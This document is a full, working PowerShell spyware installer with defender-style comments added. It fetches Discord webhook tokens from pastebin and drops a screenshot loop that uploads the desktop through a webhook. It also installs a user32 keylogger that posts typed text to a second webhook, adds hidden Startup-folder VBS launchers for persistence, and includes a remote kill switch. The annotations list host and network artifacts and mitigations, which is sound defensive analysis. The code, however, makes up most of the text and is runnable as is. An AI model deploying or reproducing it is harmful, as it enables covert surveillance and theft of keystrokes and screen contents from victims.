- # ANALYSIS NOTE: this paste is a PowerShell stager for a screenshot/keystroke
- # exfiltration tool. The annotations below describe what the visible code does
- # and the host/network artifacts a defender can look for; the code itself is
- # left untouched.
- #
- # Stage 0: the Discord webhook tokens and a "kill switch" URL are fetched from
- # raw pastebin.com pages at run time, so the tokens never appear in the script
- # body. Network artifact: GET requests to pastebin.com/raw/... from powershell.exe.
- # Assume the tokens have been retrieved and stored in these variables
- $screenwebhooktoken = irm 'https://pastebin.com/raw/c8fg78KU'
- $logwebhooktoken = irm 'https://pastebin.com/raw/STyjVHJR'
- $killurl = 'https://pastebin.com/raw/aNPVXCZQ'
- # Base URL for the Discord webhook
- $webhookurl = 'https://discord.com/api/webhooks/'
- # Construct the full webhook URLs by concatenating the base URL with the tokens
- $screenwebhook = $webhookurl + $screenwebhooktoken
- $logwebhook = $webhookurl + $logwebhooktoken
- # Stage 1 payload ($scps1): a literal here-string that is written unchanged to
- # disk below. It downloads an ffmpeg zip from gyan.dev into %TEMP%, extracts
- # ffmpeg.exe, then loops: capture the desktop with `ffmpeg -f gdigrab`, upload
- # the image to the webhook with `curl.exe -F`, poll $killurl, and delete its own
- # .ps1 when the response is "kill".
- # Host artifacts: %TEMP%\ffmpeg.exe, %TEMP%\ScreenClip.jpg,
- # %APPDATA%\Microsoft\Windows\Themes\ffmpeg.ps1.
- $scps1 = @'
- $Path = "$env:Temp\ffmpeg.exe"
- If (!(Test-Path $Path)){
- $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":hourglass: ``Downloading ffmpeg.exe. Please wait...`` :hourglass:"} | ConvertTo-Json
- Invoke-RestMethod -Uri $hurl -Method Post -ContentType "application/json" -Body $jsonsys
- $zipUrl = 'https://www.gyan.dev/ffmpeg/builds/packages/ffmpeg-7.0-essentials_build.zip'
- $tempDir = "$env:temp"
- $zipFilePath = Join-Path $tempDir 'ffmpeg-7.0-essentials_build.zip'
- $extractedDir = Join-Path $tempDir 'ffmpeg-7.0-essentials_build'
- Invoke-WebRequest -Uri $zipUrl -OutFile $zipFilePath
- Expand-Archive -Path $zipFilePath -DestinationPath $tempDir -Force
- Move-Item -Path (Join-Path $extractedDir 'bin\ffmpeg.exe') -Destination $tempDir -Force
- Remove-Item -Path $zipFilePath -Force
- Remove-Item -Path $extractedDir -Recurse -Force
- }
- $mkvPath = "$env:Temp\ScreenClip.jpg"
- if (Test-Path $mkvpath){
- rm -Path $mkvPath -Force
- }
- $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":arrows_counterclockwise: ``Taking Screenshots..`` :arrows_counterclockwise:"} | ConvertTo-Json
- Invoke-RestMethod -Uri $hurl -Method Post -ContentType "application/json" -Body $jsonsys
- while ($true){
- .$env:Temp\ffmpeg.exe -f gdigrab -i desktop -frames:v 1 -vf "fps=1" $mkvPath
- sleep 2
- curl.exe -F file1=@"$mkvPath" $hurl | Out-Null
- sleep 5
- rm -Path $mkvPath -Force
- $response = irm $killurl
- if ($response -like "kill") {
- rm -path "$env:APPDATA\Microsoft\Windows\Themes\ffmpeg.ps1"
- $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":octagonal_sign: ``REMOVED`` :octagonal_sign:"} | ConvertTo-Json
- Invoke-RestMethod -Uri $hurl -Method Post -ContentType "application/json" -Body $jsonsys
- exit
- }
- }
- '@
- # Drop stage 1: the first line binds $hurl/$killurl to the resolved URLs, then
- # the here-string body is appended. Detection point: powershell.exe creating a
- # .ps1 under %APPDATA%\Microsoft\Windows\Themes\, which is not a normal location
- # for scripts.
- "`$hurl = '$screenwebhook' ; `$killurl = '$killurl'" | Out-File -FilePath "$env:APPDATA\Microsoft\Windows\Themes\ffmpeg.ps1" -Force
- $scps1 | Out-File -FilePath "$env:APPDATA\Microsoft\Windows\Themes\ffmpeg.ps1" -Append -Force
- # Stage 2 payload (keylogger), assembled from two here-strings because the
- # inner @'...'@ C# signature block has to be closed by a literal '@ that is
- # written separately below.
- # $klps1: user32.dll P/Invoke declarations (GetAsyncKeyState, GetKeyboardState,
- # MapVirtualKey, ToUnicode) that stage 2 compiles in-process with Add-Type.
- $klps1 = @'
- $API = @'
- [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
- public static extern short GetAsyncKeyState(int virtualKeyCode);
- [DllImport("user32.dll", CharSet=CharSet.Auto)]
- public static extern int GetKeyboardState(byte[] keystate);
- [DllImport("user32.dll", CharSet=CharSet.Auto)]
- public static extern int MapVirtualKey(uint uCode, int uMapType);
- [DllImport("user32.dll", CharSet=CharSet.Auto)]
- public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
- '@
- # $klps2: the main keylogger loop. It polls GetAsyncKeyState for virtual-key
- # codes 8..254 every 30 ms, translates keys with ToUnicode, buffers them in
- # $send, and once 10 s pass without a keypress POSTs the buffer (timestamped,
- # wrapped in backticks) to the log webhook. It also polls $killurl and deletes
- # update_check.ps1 when the response is "kill".
- # Detection points: Add-Type compiling a user32 P/Invoke wrapper inside a hidden
- # powershell.exe, and periodic HTTPS POSTs to discord.com/api/webhooks/.
- $klps2 = @'
- $API = Add-Type -MemberDefinition $API -Name 'Win32' -Namespace API -PassThru
- $LastKeypressTime = [System.Diagnostics.Stopwatch]::StartNew()
- $KeypressThreshold = [TimeSpan]::FromSeconds(10)
- While ($true){
- $keyPressed = $false
- try{
- while ($LastKeypressTime.Elapsed -lt $KeypressThreshold) {
- Start-Sleep -Milliseconds 30
- for ($asc = 8; $asc -le 254; $asc++){
- $keyst = $API::GetAsyncKeyState($asc)
- if ($keyst -eq -32767) {
- $keyPressed = $true
- $LastKeypressTime.Restart()
- $null = [console]::CapsLock
- $vtkey = $API::MapVirtualKey($asc, 3)
- $kbst = New-Object Byte[] 256
- $checkkbst = $API::GetKeyboardState($kbst)
- $logchar = New-Object -TypeName System.Text.StringBuilder
- if ($API::ToUnicode($asc, $vtkey, $kbst, $logchar, $logchar.Capacity, 0)) {
- $LString = $logchar.ToString()
- if ($asc -eq 8) {$LString = "[BKSP]"}
- if ($asc -eq 13) {$LString = "[ENT]"}
- if ($asc -eq 27) {$LString = "[ESC]"}
- $send += $LString
- }
- }
- }
- $response = irm $killurl
- if ($response -like "kill") {
- rm -path "$env:APPDATA\Microsoft\Windows\Themes\update_check.ps1"
- $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":octagonal_sign: ``REMOVED`` :octagonal_sign:"} | ConvertTo-Json
- Invoke-RestMethod -Uri $dc -Method Post -ContentType "application/json" -Body $jsonsys
- exit
- }
- }
- }
- finally{
- If ($keyPressed) {
- $escmsgsys = $send -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')}
- $timestamp = Get-Date -Format "dd-MM-yyyy HH:mm:ss"
- $escmsg = $timestamp+" : "+'`'+$escmsgsys+'`'
- $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsg} | ConvertTo-Json
- Invoke-RestMethod -Uri $dc -Method Post -ContentType "application/json" -Body $jsonsys
- $send = ""
- $keyPressed = $false
- }
- }
- $LastKeypressTime.Restart()
- Start-Sleep -Milliseconds 10
- }
- '@
- # Drop stage 2 into update_check.ps1 in the same Themes directory: the URL
- # binding line, the P/Invoke text, a literal '@ to close it, then the loop body.
- "`$dc = '$logwebhook' ; `$killurl = '$killurl'" | Out-File -FilePath "$env:APPDATA\Microsoft\Windows\Themes\update_check.ps1" -Force
- $klps1 | Out-File -FilePath "$env:APPDATA\Microsoft\Windows\Themes\update_check.ps1" -Append -Force
- "'@" | Out-File -FilePath "$env:APPDATA\Microsoft\Windows\Themes\update_check.ps1" -Append -Force
- $klps2 | Out-File -FilePath "$env:APPDATA\Microsoft\Windows\Themes\update_check.ps1" -Append -Force
- # Persistence: two VBScript launchers in the user's Startup folder that run the
- # dropped scripts with "-NoP -NonI -Exec Bypass -W Hidden" at each logon.
- # Detection points: new .vbs files under ...\Start Menu\Programs\Startup\
- # (service.vbs, update.vbs); a script host (typically wscript.exe) spawning
- # powershell.exe with -W Hidden -Exec Bypass.
- # Mitigations: monitor Startup-folder writes, enforce Constrained Language Mode
- # or application control for powershell.exe, and filter egress to Discord
- # webhook endpoints where the organisation does not use them.
- $tobat = @'
- Set objShell = CreateObject("WScript.Shell")
- WScript.Sleep 500
- objShell.Run "powershell.exe -NoP -NonI -Exec Bypass -W Hidden -File ""%APPDATA%\Microsoft\Windows\Themes\ffmpeg.ps1""", 0, True
- '@
- $pth = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\service.vbs"
- $tobat | Out-File -FilePath $pth -Force
- $tobat2 = @'
- Set objShell = CreateObject("WScript.Shell")
- WScript.Sleep 500
- objShell.Run "powershell.exe -NoP -NonI -Exec Bypass -W Hidden -File ""%APPDATA%\Microsoft\Windows\Themes\update_check.ps1""", 0, True
- '@
- $pth2 = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\update.vbs"
- $tobat2 | Out-File -FilePath $pth2 -Force
- # Report success to the screenshot webhook, then run both launchers right away
- # so the implants start in this session without waiting for a reboot.
- $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":white_check_mark: ``Persistance Installed!`` :white_check_mark:"} | ConvertTo-Json
- Invoke-RestMethod -Uri $screenwebhook -Method Post -ContentType "application/json" -Body $jsonsys
- sleep 1
- & $pth
- sleep 1
- & $pth2
- pause